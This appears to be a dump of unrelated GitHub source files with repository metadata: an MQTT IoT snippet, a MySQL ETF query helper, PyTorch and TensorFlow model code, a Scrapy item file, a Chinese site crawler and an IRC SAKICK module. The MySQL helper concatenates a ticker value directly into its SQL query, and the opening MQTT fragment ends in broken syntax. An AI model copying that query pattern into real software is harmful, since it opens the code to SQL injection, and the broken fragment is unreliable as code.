message = client.publish(mqtt_topic, payload, qos=1)
message.wait_for_publish()
def detach_device(client):
"""Notify broker a device has been detached."""
print()
print("Detach Device")
print("================================================")
print()
# Publish to the topic to detach device
mqtt_topic = f"/devices/{DEVICE_ID}/detach"
# Create payload
payload = None
# Publish something
print("Publishing")
print(" Topic: " + mqtt_topic)
print(" Payload: " + str(payload))
print()
# Publish "payload" to the MQTT topic. qos=1 means at least once
# delivery. Cloud IoT Core also supports qos=0 for at most once
# delivery.
message = client.publish(mqtt_topic, payload, qos=1)
message.wait_for_publish()
def publish_events(client, payload):
"""Publish an event."""
print()
print("Publish Events")
print("================================================")
print()
# Attach device to gateway
attach_device(client)
# Publish to the events
mqtt_topic = f"/devices/{DEVICE_ID}/events"
# Publish something
print("Publishing")
print(" Topic: " + mqtt_topic)
print(" Payload: " + payload)
print()
# Publish "payload" to the MQTT topic. qos=1 means at least once
# delivery. Cloud IoT Core also supports qos=0 for at most once
# delivery.
message = client.publish(mqtt_topic, payload, qos=1)
message.wait_for_publish()
# Detach device from gateway
detach_device(client)
def command:
mqtt_topic = f"/devices/{DEVICE_ID}/commands/#
print('hello')
| [
"noreply@github.com"
] | bransyah.noreply@github.com |
2638d5a94f13b1dd9710696b782e2a9917a36ecf | d3efc82dfa61fb82e47c82d52c838b38b076084c | /ETF/etf_mysql/QueryEtfcountDB.py | c87ce03178907dbea9a4db749e8d62ffbca25e77 | [] | no_license | nantongzyg/xtp_test | 58ce9f328f62a3ea5904e6ed907a169ef2df9258 | ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f | refs/heads/master | 2022-11-30T08:57:45.345460 | 2020-07-30T01:43:30 | 2020-07-30T01:43:30 | 280,388,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 668 | py | #!/usr/bin/python
# -*- encoding: utf-8 -*-
import MySQLdb
import time
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/mysql")
from mysql_config import *
def QueryEtfcountDB(ticker):
date = time.strftime('%Y%m%d', time.localtime(time.time()))
str = ('SELECT sum(component_share) from xtp_etf_components_' + date +
' a join xtp_etf_baseinfo_'+ date +
' b on a.etf_code1 = b.etf_code1 where b.ticker=' + ticker +
' and a.substitute_flag in (0,1);')
conn = connectMysql()
cur = conn.cursor()
cur.execute(str)
rs = cur.fetchone()
cur.close()
conn.close()
return float(rs[0]) if rs[0] else 0
| [
"418033945@qq.com"
] | 418033945@qq.com |
89ff34b007ce902cc181bb8558322d1b36c921a2 | 42419e1bba2c6915fb3f9b89d64e27994d9763c5 | /src/network.py | d6a0066875f85f1d28301b0bb5be6eb677c60adc | [
"MIT"
] | permissive | xiamenwcy/Counting-ICCV-DSSINet | 904cae03ea99625e31c70c78a46c83e51fc8077d | 2582e5f6e117e63ef743c09318e70eae13bcc395 | refs/heads/master | 2022-02-22T17:08:41.058817 | 2019-10-29T15:29:15 | 2019-10-29T15:29:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,824 | py | from __future__ import print_function
import torch
import torch.nn as nn
from torch.autograd import Variable, Function
from torch.nn.modules.conv import _ConvNd
from torch.nn.modules.utils import _pair
from torch.nn import functional as F
from utils import compute_same_padding2d
import logging
from math import exp
import numpy as np
from collections import OrderedDict, namedtuple
from torch.nn import init
class GradReverse(Function):
def __init__(self, lambd):
self.lambd = lambd
def forward(self, x):
return x.view_as(x)
def backward(self, grad_output):
if torch.isnan(grad_output).any():
return grad_output.zero_()
else:
return (grad_output * -self.lambd)
def grad_reverse(x, lambd):
return GradReverse(lambd)(x)
class Conv2d(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, groups=1, dilation=1, NL='relu',same_padding=True, bn=False, bias=True):
super(Conv2d, self).__init__()
padding = int((kernel_size - 1) / 2) if same_padding else 0
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride, groups=groups, dilation=dilation, padding=padding, bias=bias)
self.bn = nn.BatchNorm2d(out_channels, eps=0.001, momentum=0, affine=True) if bn else None
if NL == 'relu' :
self.relu = nn.ReLU(inplace=True)
elif NL == 'prelu':
self.relu = nn.PReLU()
elif NL == 'tanh':
self.relu = nn.Tanh()
elif NL == 'sigmoid':
self.relu = nn.Sigmoid()
elif NL == 'lrelu':
self.relu = nn.LeakyReLU(inplace=True)
else:
self.relu = None
def forward(self, x):
x = self.conv(x)
if self.bn is not None:
x = self.bn(x)
if self.relu is not None:
x = self.relu(x)
return x
class Conv2d_dilated(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, NL='relu', same_padding=False, dilation=1, bn=False, bias=True, groups=1):
super(Conv2d_dilated, self).__init__()
self.conv = _Conv2d_dilated(in_channels, out_channels, kernel_size, stride, dilation=dilation, groups=groups, bias=bias)
self.bn = nn.BatchNorm2d(out_channels, eps=0.001, momentum=0, affine=True) if bn else None
if NL == 'relu' :
self.relu = nn.ReLU(inplace=True)
elif NL == 'prelu':
self.relu = nn.PReLU()
elif NL == 'tanh':
self.relu = nn.Tanh()
elif NL == 'lrelu':
self.relu = nn.LeakyReLU(inplace=True)
elif NL == 'sigmoid':
self.relu = nn.Sigmoid()
else:
self.relu = None
def forward(self, x, dilation=None):
x = self.conv(x, dilation)
if self.bn is not None:
x = self.bn(x)
if self.relu is not None:
x = self.relu(x)
return x
class _Conv2d_dilated(_ConvNd):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, dilation=1, groups=1, bias=True):
kernel_size = _pair(kernel_size)
stride = _pair(stride)
dilation = _pair(dilation)
super(_Conv2d_dilated, self).__init__(
in_channels, out_channels, kernel_size, stride, _pair(0), dilation,
False, _pair(0), groups, bias)
def forward(self, input, dilation=None):
input_shape = list(input.size())
dilation_rate = self.dilation if dilation is None else _pair(dilation)
padding, pad_input = compute_same_padding2d(input_shape, kernel_size=self.kernel_size, strides=self.stride, dilation=dilation_rate)
if pad_input[0] == 1 or pad_input[1] == 1:
input = F.pad(input, [0, int(pad_input[0]), 0, int(pad_input[1])])
return F.conv2d(input, self.weight, self.bias, self.stride,
(padding[0] // 2, padding[1] // 2), dilation_rate, self.groups)
#https://github.com/pytorch/pytorch/issues/3867
class FC(nn.Module):
def __init__(self, in_features, out_features, NL='relu'):
super(FC, self).__init__()
self.fc = nn.Linear(in_features, out_features)
if NL == 'relu' :
self.relu = nn.ReLU(inplace=True)
elif NL == 'prelu':
self.relu = nn.PReLU()
else:
self.relu = None
def forward(self, x):
x = self.fc(x)
if self.relu is not None:
x = self.relu(x)
return x
class SequentialEndpoints(nn.Module):
def __init__(self, layers, endpoints=None):
super(SequentialEndpoints, self).__init__()
assert isinstance(layers, OrderedDict)
for key, module in layers.items():
self.add_module(key, module)
if endpoints is not None:
self.Endpoints = namedtuple('Endpoints', endpoints.values(), verbose=True)
self.endpoints = endpoints
def __getitem__(self, idx):
if not (-len(self) <= idx < len(self)):
raise IndexError('index {} is out of range'.format(idx))
if idx < 0:
idx += len(self)
it = iter(self._modules.values())
for i in range(idx):
next(it)
return next(it)
def __len__(self):
return len(self._modules)
def sub_forward(self, startpoint, endpoint):
def forward(input):
flag = False
for key, module in self._modules.items():
if startpoint == endpoint:
output = input
if key == startpoint:
output = module(output)
return output
elif flag or key == startpoint:
if key == startpoint:
output = input
flag = True
output = module(output)
if key == endpoint:
return output
return output
return forward
def forward(self, input, require_endpoints=False):
if require_endpoints:
endpoints = self.Endpoints([None] * len(self.endpoints.keys()))
for key, module in self._modules.items():
input = module(input)
if require_endpoints and key in self.endpoints.keys():
setattr(endpoints, self.endpoints[key], input)
if require_endpoints:
return input, endpoints
else:
return input
def save_net(fname, net):
if isinstance(net, torch.nn.DataParallel):
net = net.module
import h5py
with h5py.File(fname, mode='w') as h5f:
for k, v in net.state_dict().items():
if k in h5f.keys():
del h5f[k]
h5f.create_dataset(k, data=v.cpu().numpy())
def load_net(fname, net, skip=False, prefix=''):
if isinstance(net, torch.nn.DataParallel):
net = net.module
import h5py
with h5py.File(fname, mode='r') as h5f:
for k, v in net.state_dict().items():
if skip:
if 'relu' in k:
v.copy_(torch.from_numpy(np.zeros((1,))))
continue
if 'loss' in k:
# print(k)
continue
assert (prefix + k) in h5f.keys(), "key: {} size: {}".format(k, v.size())
param = torch.from_numpy(np.asarray(h5f[(prefix + k)]))
assert v.size() == param.size(), "{}: h5~{}-need~{}".format(k, param.size(), v.size())
v.copy_(param)
def diff_net(fname, net):
import h5py
with h5py.File(fname, mode='r') as h5f:
for k, v in net.state_dict().items():
assert k in h5f.keys(), "key: {} size: {}".format(k, v.size())
param = torch.from_numpy(np.asarray(h5f[k]))
assert v.size() == param.size(), "{}: h5~{}-need~{}".format(k, param.size(), v.size())
print("{}: {}".format(k, torch.mean(v - param.cuda())))
def np_to_variable(x, is_cuda=True, is_training=False, dtype=torch.FloatTensor):
if is_training:
v = Variable(torch.from_numpy(x).type(dtype))
else:
if '0.3.1' not in torch.__version__ and '0.3.0' not in torch.__version__:
with torch.no_grad():
v = Variable(torch.from_numpy(x).type(dtype), requires_grad = False)
else:
v = Variable(torch.from_numpy(x).type(dtype), requires_grad = False, volatile = True)
if is_cuda:
# v = v.cuda(non_blocking=True)
v = v.cuda()
return v
def set_trainable(model, requires_grad):
for param in model.parameters():
param.requires_grad = requires_grad
def weights_normal_init(model, dev=0.01):
if isinstance(model, list):
for m in model:
weights_normal_init(m, dev)
else:
for m in model.modules():
if isinstance(m, nn.Conv2d):
m.weight.data.normal_(0.0, dev)
if m.bias is not None:
m.bias.data.fill_(0.0)
elif isinstance(m, nn.LSTM):
for weight_set in m._all_weights:
for param in weight_set:
if 'weight' in param:
m.__getattr__(param).data.normal_(0.0, dev)
if 'bias' in param:
m.__getattr__(param).data.fill_(0.0)
elif isinstance(m, _Conv2d_dilated):
m.weight.data.copy_(m.weight.data.normal_(0.0, dev))
if m.bias is not None:
m.bias.data.fill_(0.0)
elif isinstance(m, nn.Linear):
m.weight.data.normal_(0.0, dev)
elif isinstance(m, nn.BatchNorm2d):
init.normal(m.weight.data, 1.0, 0.02)
init.constant(m.bias.data, 0.0) | [
"gek_u@foxmail.com"
] | gek_u@foxmail.com |
cbfb4ec1efcc22c8bed49f3d5112e308cf9f64db | 83ee7862590cf47efb0f38b39d1a0c4bf4d5a2f8 | /dl_tools/common/exception.py | c34149051c03636cc30b93dd8924343441ad947e | [] | no_license | lygztq/deep-learning-tools | f92523b4b67e842d7cd66681fa9151f8c088ebe3 | 7b8c3be8e2728a7066ffabce9adc33f8a95bb510 | refs/heads/master | 2020-08-28T08:29:01.977429 | 2019-10-26T03:39:29 | 2019-10-26T03:39:29 | 217,649,677 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 38 | py | class EmptyAttribute(object):
pass | [
"lygztq@gmail.com"
] | lygztq@gmail.com |
8f6969872bdcbfe8e05ab30d2c37160924a1798e | 14c3de56e43e6ee2fd281c3c30c6a899c88a5636 | /lesson_5/jobparser/items.py | 490fc9a1eb156954514a96079ce667f97f22a76f | [] | no_license | Hadirback/python_data_parsing_course | 8b17ad4d62e4bd86c3ec270682b6350b5a9bcce8 | 46ee6f9fb7b9ea54cf7bfeecfe8da0dd2072d61a | refs/heads/master | 2022-10-17T07:15:06.641823 | 2020-06-08T20:24:27 | 2020-06-08T20:24:27 | 263,717,412 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import scrapy
class JobparserItem(scrapy.Item):
# define the fields for your item here like:
name = scrapy.Field()
salary = scrapy.Field()
salary_min = scrapy.Field()
salary_max = scrapy.Field()
pass
| [
"mail.evgeny.filippov@gmail.com"
] | mail.evgeny.filippov@gmail.com |
011abdf7e55854aad8d948f584ab8fcc499a4084 | 3618700bbeb5dd36b01ab3a39fe36e1a09de3d1e | /crawler/Trst1.py | 0cb7a556d4ab42c0a91b4d11a01ff151e915f88b | [] | no_license | Guaijs/Sql_injection_detection | d2c6d4ca0a45781ab86b0b55cbf0191ae38d6173 | 6d00a1859f9dd549c700e0768d19db93cf480065 | refs/heads/master | 2022-06-02T10:38:08.629298 | 2020-05-05T14:32:38 | 2020-05-05T14:32:38 | 250,199,151 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,322 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Sep 29 14:01:28 2018
@author: ESionJL数据猫
question:1.当前url若爬取到的pagelinks为[],则将其移除visited列表。
2.spiderpage()函数中,当前url爬取到的网页为UNknown,会报错,如何规避,并将此url移除。
3.返回title为空
4.网站不可加载
5.过期网站,垃圾网站
"""
import re
import requests
from bs4 import BeautifulSoup
from urllib import request
from urllib import error
# 此测试首页是否可以链接
def url_get(num_retries=5):
# url = input("请输入要爬取的首页url:")
url = "https://www.newchinalife.com/"
# url = "http://"
try:
# 做一个user-agent模拟浏览器发送请求,也可以加入其它字段
kv = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko'}
requests.get(url, headers=kv)
return url
except error.URLError or error.HTTPError as e:
if num_retries > 0:
if hasattr(e, 'code') and 500 <= e.code < 600:
url_get(num_retries - 1)
print("url无法连接")
# 此函数用于提取各链接网站下的所有链接
def spiderpage(url):
try:
kv = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) Chrome/57.0.2987.98 Safari/537.36 LBBROWSER'}
r = requests.get(url, headers=kv)
r.encoding = r.apparent_encoding
pagetext = r.text
# 正则表达式表示要爬取的是<a href="和"中的内容,"或'都可以,即当前页面下所有的链接url,返回列表
pagelinks = re.findall(r'(?<=<a href=\").*?(?=\")|(?<=href=\').*?(?=\')', pagetext)
# print(pagelinks)
return pagelinks
except:
pagelinks = ['http://']
print("这个网站有点东西")
return pagelinks
# 此函数用来检测链接是否为外网链接或者不合格链接
def getTitle(url):
# 检验是否为本站链接,防止死循环爬取,如链接跳出本站则不进行操作
headers = {'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.8',
'Cache-Control': 'max-age=0',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36',
'Connection': 'keep-alive',
'Referer': 'http://www.baidu.com/'
}
print(url)
req = request.Request(url, headers=headers)
html = None
try:
response = request.urlopen(req)
html = response.read().decode('utf-8')
soup = BeautifulSoup(html, "html.parser")
if soup.body is not None:
url_list = soup.head.title
title = url_list.string
print(title)
if title != None:
return title
else:
return "这网站没有灵性"
else:
title = "不可加载"
return title
# except error.URLError or error.HTTPError or error.UnicodeDecodeError:
except:
print("这网站没有灵性")
return "不可加载"
# 正则删选函数
def url_filtrate(pagelinks):
same_target_url = []
try:
for murl in pagelinks:
murl = re.sub(r'\s+', '', murl)
if re.findall("^java", murl) or re.findall("^jse", murl) or re.findall("^ALL", murl) or re.findall("pdf$",
murl) or re.findall(
"^login", murl) or re.findall("css$", murl) or re.findall("@", murl):
pagelinks.remove(murl)
elif re.findall("^http", murl) and re.findall("newchinalife", murl) is None:
pagelinks.remove(murl)
elif re.findall("^http", murl):
murl = str(murl)
same_target_url.append(murl)
elif re.findall("^java", murl) or re.findall("^jse", murl) or re.findall("^ALL", murl) or re.findall("pdf$",
murl) or re.findall(
"^login", murl):
pagelinks.remove(murl)
elif re.findall("gsp$", murl) or re.findall("shtml$", murl) or re.findall("[0-9]*$", murl):
murl = "https://www.newchinalife.com" + str(murl)
same_target_url.append(murl)
elif re.findall("^/", murl):
murl = "https://www.newchinalife.com" + str(murl)
same_target_url.append(murl)
else:
pass
except ValueError as e:
pass
# 去除重复url
unrepect_url = []
for l in same_target_url:
if l not in unrepect_url:
unrepect_url.append(l)
print(unrepect_url)
return unrepect_url
class linkQuence:
def __init__(self):
# 已访问的url集合
self.visited = []
# 待访问的url集合
self.unvisited = []
# 获取访问过的url队列
def getvisitedurl(self):
return self.visited
# 获取未访问的url队列
def getunvisitedurl(self):
return self.unvisited
# 添加url到访问过得队列中
def addvisitedurl(self, url):
return self.visited.append(url)
# 移除访问过得url
def removevisitedurl(self, url):
return self.visited.remove(url)
# 从未访问队列中取一个url
def unvisitedurldequence(self):
try:
return self.unvisited.pop()
except:
return None
# 添加url到未访问的队列中
def addunvisitedurl(self, url):
if url != "" and url not in self.visited and url not in self.unvisited:
return self.unvisited.insert(0, url)
# 获得已访问的url数目
def getvisitedurlount(self):
return len(self.visited)
# 获得未访问的url数目
def getunvistedurlcount(self):
return len(self.unvisited)
# 判断未访问的url队列是否为空
def unvisitedurlsempty(self):
return len(self.unvisited) == 0
class Spider():
def __init__(self, url):
self.linkQuence = linkQuence() # 将队列引入本类
self.linkQuence.addunvisitedurl(url) # 传入待爬取的url,即爬虫入口
# 真正的爬取链接函数
def crawler(self, urlcount):
# 子页面过多,为测试方便加入循环控制子页面数量
x = 1
while self.linkQuence.unvisited or x == urlcount:
# 若子页面不是很多,可以直接使用队列中的未访问列表非空作为循环条件
# while not self.linkQuence.unvisitedurlsempty():
if x > 1:
print(f"第{x-1}个url,开始爬")
visitedurl = self.linkQuence.unvisitedurldequence() # 从未访问列表中pop出一个url
if visitedurl is None or visitedurl == '':
continue
title = getTitle(visitedurl)
if re.findall("新华保险", title): # 如果跳出本站则pass
initial_links = spiderpage(visitedurl) # 爬出该url页面中所有的链接
right_links = url_filtrate(initial_links) # 筛选出合格的链接
if not right_links:
pass
else:
self.linkQuence.addvisitedurl(visitedurl) # 将该url放到访问过的url队列中
for link in right_links: # 将筛选出的链接放到未访问队列中
self.linkQuence.addunvisitedurl(link)
x += 1
else:
pass
print(f"爬完了")
return self.linkQuence.visited
# 写文件函数
def writetofile(urllist):
# 写入网站并计数
x = 1
for url in urllist:
# Furls.txt用于保存链接
file = open('Furls.txt', 'a', encoding='utf8')
file.write(f'{url}\n')
x += 1
file.close()
print(f'写入已完成,总计{x-1}个网页的子链接')
# 主循环
if __name__ == '__main__':
url = url_get()
spider = Spider(url)
# 传入要爬取的子链接数量
urllist = spider.crawler(5000)
writetofile(urllist) | [
"1249697647@qq.com"
] | 1249697647@qq.com |
c772b810a9760e5ff8cbb46d46b9a06bb0bc6a44 | 626eb6d26cfbf605da6948e18ae265bbdb393908 | /txircd/modules/sakick.py | 02db8c8825db25c4aa0109423f069d7b062e3d47 | [
"BSD-3-Clause"
] | permissive | smillaedler/txircd | 3e4cf8ca4d61876b8b5672cb0d4fa4729cb0fb10 | 6a5a65edb9d9ed383a14dc7fa758071805220a04 | refs/heads/master | 2021-01-17T06:09:57.960863 | 2013-07-21T03:36:24 | 2013-07-21T03:36:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,051 | py | from twisted.words.protocols import irc
from txircd.modbase import Command
class SakickCommand(Command):
def onUse(self, user, data):
cdata = data["targetchan"]
udata = data["targetuser"]
reason = data["reason"]
cdata.sendChannelMessage("KICK", udata.nickname, ":{}".format(reason), prefix=user.prefix())
udata.leave(cdata)
def processParams(self, user, params):
if user.registered > 0:
user.sendMessage(irc.ERR_NOTYETREGISTERED, "SAKICK", ":You have not registered")
return {}
if "o" not in user.mode:
user.sendMessage(irc.ERR_NOPRIVILEGES, ":Permission denied - You do not have the correct operator privileges")
return {}
if not params or len(params) < 2:
user.sendMessage(irc.ERR_NEEDMOREPARAMS, "SAKICK", ":Not enough parameters")
return {}
if params[0] not in self.ircd.channels:
user.sendMessage(irc.ERR_NOSUCHCHANNEL, params[0], ":No such channel")
return {}
if params[1] not in self.ircd.users:
user.sendMessage(irc.ERR_NOSUCHNICK, params[1], ":No such nick")
return {}
cdata = self.ircd.channels[params[0]]
udata = self.ircd.users[params[1]]
if udata not in cdata.users:
user.sendMessage(irc.ERR_USERNOTINCHANNEL, udata.nickname, cdata.name, ":They are not on that channel")
return {}
if len(params) >= 3:
reason = " ".join(params[2:])
else:
reason = user.nickname
return {
"user": user,
"targetchan": self.ircd.channels[params[0]],
"targetuser": self.ircd.users[params[1]],
"reason": reason
}
class Spawner(object):
def __init__(self, ircd):
self.ircd = ircd
def spawn(self):
return {
"commands": {
"SAKICK": SakickCommand()
}
}
def cleanup(self):
del self.ircd.commands["SAKICK"] | [
"ElementAlchemist7@gmail.com"
] | ElementAlchemist7@gmail.com |
8b748833500e66fb41053714a4da66557c56381b | 0347ccdb695e43c79fc4907d283cc82ceb72355e | /model.bidaf+cnn.py | 934c44906aa35d26f1abcc71a967ba81fffe3e4b | [] | no_license | daguix/cs224n-assignment4 | a8d4d277ad174453f92ed45af788766b100c718f | b71a208b98516bebb3b7f266b8154ba45111ac6c | refs/heads/master | 2020-03-13T21:38:21.309076 | 2018-05-18T15:56:50 | 2018-05-18T15:56:50 | 131,300,519 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,068 | py | import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import time
from os.path import join as pjoin
import numpy as np
import tensorflow as tf
from utils import Progbar
from evaluate import evaluate
import numbers
from evaluate import evaluate
from tensorflow.contrib.layers import xavier_initializer
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.framework import ops
from layers import residual_block, conv
DATA_DIR = "./data/squad"
def load_from_file(file):
with open(pjoin(DATA_DIR, file), "r") as f:
return np.array([list(map(int, line.strip().split()))
for line in f])
def create_dataset(file):
dataset = tf.data.TextLineDataset(pjoin(DATA_DIR, file))
string_split = dataset.map(lambda string: tf.string_split([string]).values)
integer_dataset = string_split.map(
lambda x: tf.string_to_number(x, out_type=tf.int32))
return integer_dataset
def with_length(dataset):
with_length = dataset.map(lambda x: (x, tf.size(x)))
return with_length
def load_word_embeddings():
return np.load(pjoin(DATA_DIR, "glove.trimmed.100.npz"))["glove"].astype(np.float32)
def load_vocabulary():
with open(pjoin(DATA_DIR, "vocab.dat"), "r") as f:
return np.array([line.strip() for line in f])
def convert_indices_to_text(vocabulary, context, start, end):
if end < start:
return ''
elif end >= len(context):
return ''
else:
return ' '.join(np.take(vocabulary, np.take(context, range(start, end+1))))
def preprocess_softmax(tensor, mask):
inverse_mask = tf.subtract(tf.constant(1.0), tf.cast(mask, tf.float32))
penalty_value = tf.multiply(inverse_mask, tf.constant(-1e9))
return tf.where(mask, tensor, penalty_value)
def bilstm(question_embeddings, question_lengths, lstm_hidden_size, keep_prob=1.0):
lstm_cell_fw = tf.nn.rnn_cell.GRUCell(
lstm_hidden_size, name="gru_cell_fw")
lstm_cell_fw = tf.nn.rnn_cell.DropoutWrapper(
lstm_cell_fw, input_keep_prob=keep_prob)
lstm_cell_bw = tf.nn.rnn_cell.GRUCell(
lstm_hidden_size, name="gru_cell_bw")
lstm_cell_bw = tf.nn.rnn_cell.DropoutWrapper(
lstm_cell_bw, input_keep_prob=keep_prob)
(question_output_fw, question_output_bw), (question_output_final_fw, question_output_final_bw) = tf.nn.bidirectional_dynamic_rnn(
lstm_cell_fw, lstm_cell_bw, question_embeddings, sequence_length=question_lengths, dtype=tf.float32, time_major=False)
question_output = tf.concat(
[question_output_fw, question_output_bw], 2)
question_output_final = tf.concat(
[question_output_final_fw, question_output_final_bw], 1)
return (question_output, question_output_final)
def zoneout(x, keep_prob, noise_shape=None, seed=None, name=None):
"""Computes zoneout (including dropout without scaling).
With probability `keep_prob`.
By default, each element is kept or dropped independently. If `noise_shape`
is specified, it must be
[broadcastable](http://docs.scipy.org/doc/numpy/user/basics.broadcasting.html)
to the shape of `x`, and only dimensions with `noise_shape[i] == shape(x)[i]`
will make independent decisions. For example, if `shape(x) = [k, l, m, n]`
and `noise_shape = [k, 1, 1, n]`, each batch and channel component will be
kept independently and each row and column will be kept or not kept together.
Args:
x: A tensor.
keep_prob: A scalar `Tensor` with the same type as x. The probability
that each element is kept.
noise_shape: A 1-D `Tensor` of type `int32`, representing the
shape for randomly generated keep/drop flags.
seed: A Python integer. Used to create random seeds. See
[`set_random_seed`](../../api_docs/python/constant_op.md#set_random_seed)
for behavior.
name: A name for this operation (optional).
Returns:
A Tensor of the same shape of `x`.
Raises:
ValueError: If `keep_prob` is not in `(0, 1]`.
"""
with tf.name_scope(name or "dropout") as name:
x = ops.convert_to_tensor(x, name="x")
if isinstance(keep_prob, numbers.Real) and not 0 < keep_prob <= 1:
raise ValueError("keep_prob must be a scalar tensor or a float in the "
"range (0, 1], got %g" % keep_prob)
keep_prob = ops.convert_to_tensor(keep_prob,
dtype=x.dtype,
name="keep_prob")
keep_prob.get_shape().assert_is_compatible_with(tensor_shape.scalar())
# Do nothing if we know keep_prob == 1
if tensor_util.constant_value(keep_prob) == 1:
return x
noise_shape = noise_shape if noise_shape is not None else array_ops.shape(
x)
# uniform [keep_prob, 1.0 + keep_prob)
random_tensor = keep_prob
random_tensor += random_ops.random_uniform(noise_shape,
seed=seed,
dtype=x.dtype)
# 0. if [keep_prob, 1.0) and 1. if [1.0, 1.0 + keep_prob)
binary_tensor = math_ops.floor(random_tensor)
ret = x * binary_tensor
ret.set_shape(x.get_shape())
return 1. - ret
class QRNN_fo_pooling(tf.nn.rnn_cell.RNNCell):
def __init__(self, out_fmaps):
self.__out_fmaps = out_fmaps
@property
def state_size(self):
return self.__out_fmaps
@property
def output_size(self):
return self.__out_fmaps
def __call__(self, inputs, state, scope=None):
"""
inputs: 2-D tensor of shape [batch_size, Zfeats + [gates]]
"""
# pool_type = self.__pool_type
print('QRNN pooling inputs shape: ', inputs.get_shape())
print('QRNN pooling state shape: ', state.get_shape())
with tf.variable_scope(scope or "QRNN-fo-pooling"):
# extract Z activations and F gate activations
Z, F, O = tf.split(inputs, 3, 1)
print('QRNN pooling Z shape: ', Z.get_shape())
print('QRNN pooling F shape: ', F.get_shape())
print('QRNN pooling O shape: ', O.get_shape())
# return the dynamic average pooling
new_state = tf.multiply(F, state) + \
tf.multiply(tf.subtract(1., F), Z)
output = tf.multiply(O, new_state)
return output, new_state
class QRNN_f_pooling(tf.nn.rnn_cell.RNNCell):
def __init__(self, out_fmaps):
self.__out_fmaps = out_fmaps
@property
def state_size(self):
return self.__out_fmaps
@property
def output_size(self):
return self.__out_fmaps
def __call__(self, inputs, state, scope=None):
"""
inputs: 2-D tensor of shape [batch_size, Zfeats + [gates]]
"""
# pool_type = self.__pool_type
print('QRNN pooling inputs shape: ', inputs.get_shape())
print('QRNN pooling state shape: ', state.get_shape())
with tf.variable_scope(scope or "QRNN-f-pooling"):
# extract Z activations and F gate activations
Z, F = tf.split(inputs, 2, 1)
print('QRNN pooling Z shape: ', Z.get_shape())
print('QRNN pooling F shape: ', F.get_shape())
# return the dynamic average pooling
output = tf.multiply(F, state) + tf.multiply(tf.subtract(1., F), Z)
return output, output
def qrnn_f(question_embeddings, question_lengths, hidden_size, keep_prob=1.0):
filter_width = 2
in_fmaps = question_embeddings.get_shape().as_list()[-1]
out_fmaps = hidden_size
padded_input = tf.pad(question_embeddings, [
[0, 0], [filter_width - 1, 0], [0, 0]])
with tf.variable_scope('convolutions'):
Wz = tf.get_variable('Wz', [filter_width, in_fmaps, out_fmaps],
initializer=tf.random_uniform_initializer(minval=-.05, maxval=.05))
z_a = tf.nn.conv1d(padded_input, Wz, stride=1, padding='VALID')
Z = tf.nn.tanh(z_a)
Wf = tf.get_variable('Wf',
[filter_width, in_fmaps, out_fmaps],
initializer=tf.random_uniform_initializer(minval=-.05, maxval=.05))
f_a = tf.nn.conv1d(padded_input, Wf, stride=1, padding='VALID')
F = tf.sigmoid(f_a)
F = zoneout((1. - F), keep_prob)
T = tf.concat([Z, F], 2)
with tf.variable_scope('pooling'):
pooling_fw = QRNN_f_pooling(out_fmaps)
question_output, question_output_final = tf.nn.dynamic_rnn(
pooling_fw, T, sequence_length=question_lengths, dtype=tf.float32)
print('question_output', question_output.get_shape().as_list())
print('question_output_final', question_output_final.get_shape().as_list())
return (question_output, question_output_final)
def bi_qrnn_fo(question_embeddings, question_lengths, hidden_size, keep_prob=1.0):
filter_width = 2
in_fmaps = question_embeddings.get_shape().as_list()[-1]
out_fmaps = hidden_size
padded_input = tf.pad(question_embeddings, [
[0, 0], [filter_width - 1, 0], [0, 0]])
with tf.variable_scope('convolutions'):
Wz = tf.get_variable('Wz', [filter_width, in_fmaps, out_fmaps],
initializer=tf.random_uniform_initializer(minval=-.05, maxval=.05))
z_a = tf.nn.conv1d(padded_input, Wz, stride=1, padding='VALID')
Z = tf.nn.tanh(z_a)
Wf = tf.get_variable('Wf',
[filter_width, in_fmaps, out_fmaps],
initializer=tf.random_uniform_initializer(minval=-.05, maxval=.05))
f_a = tf.nn.conv1d(padded_input, Wf, stride=1, padding='VALID')
F = tf.sigmoid(f_a)
F = zoneout((1. - F), keep_prob)
Wo = tf.get_variable('Wo',
[filter_width, in_fmaps, out_fmaps],
initializer=tf.random_uniform_initializer(minval=-.05, maxval=.05))
f_o = tf.nn.conv1d(padded_input, Wo, stride=1, padding='VALID')
O = tf.sigmoid(f_o)
T = tf.concat([Z, F, O], 2)
with tf.variable_scope('pooling'):
pooling_fw = QRNN_fo_pooling(out_fmaps)
pooling_bw = QRNN_fo_pooling(out_fmaps)
(question_output_fw, question_output_bw), (question_output_final_fw, question_output_final_bw) = tf.nn.bidirectional_dynamic_rnn(
pooling_fw, pooling_bw, T, sequence_length=question_lengths, dtype=tf.float32)
question_output = tf.concat(
[question_output_fw, question_output_bw], 2)
question_output_final = tf.concat(
[question_output_final_fw, question_output_final_bw], 1)
return (question_output, question_output_final)
class Baseline(object):
def __init__(self, train_dataset, val_dataset, embedding, vocabulary, batch_size=128):
self.train_dataset = train_dataset
self.val_dataset = val_dataset
self.embedding = embedding
self.batch_size = batch_size
self.lr = 0.005
